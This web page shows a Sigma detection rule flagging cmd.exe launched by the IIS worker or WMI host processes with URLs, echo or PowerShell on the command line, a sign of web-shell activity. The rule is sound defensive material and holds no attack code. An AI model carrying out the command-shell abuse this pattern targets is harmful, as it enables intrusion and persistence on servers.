Command Shell Unusual or Suspicious Process Ancestry

Nov 9, 2022 · attack.persistence attack.t1505 attack.execution attack.t1059.003 ·

Looks for suspicious process interactions between the Windows IIS worker process (w3wp.exe) and the command shell. Inspired by the 2022 Red Canary Threat Detection report.

Sigma rule (View on GitHub)

 1title: Command Shell Unusual or Suspicious Process Ancestry
 2id: 157c153a-97d1-43e4-bc25-5461f52c935d
 3status: experimental
 4description: Looks for suspicious process interactions between the Windows IIS worker
 5    process (w3wp.exe) and the command shell. Inspired by the 2022 Red Canary Threat
 6    Detection report.
 7references:
 8    - https://redcanary.com/threat-detection-report/techniques/windows-command-shell/
 9author: Micah Babinski
10date: 2022/11/03
11tags:
12    - attack.persistence
13    - attack.t1505
14    - attack.execution
15    - attack.t1059.003
16logsource:
17    category: process_creation
18    product: windows
19detection:
20    selection_process:
21        Image|endswith: '\cmd.exe'
22        ParentImage|endswith:
23            - '\w3wp.exe'
24            - '\wmiprvse.exe'
25    selection_cmdline:
26        - CommandLine|contains:
27                - 'http://'
28                - 'https://'
29                - 'echo'
30        - CommandLine|contains|all:
31                - '/c'
32                - 'powershell.exe'
33    condition: selection_process and selection_cmdline
34falsepositives:
35    - Unknown
36level: high```

References

Red Canary analyzes how Windows Command Shell is used by adversaries

Windows Command Shell is a favorite among adversaries because it can call on any executable on the system to execute batch files and more.

Read More

Command Shell Unusual or Suspicious Process Ancestry

Sigma rule (View on GitHub)

References

Red Canary analyzes how Windows Command Shell is used by adversaries

Related rules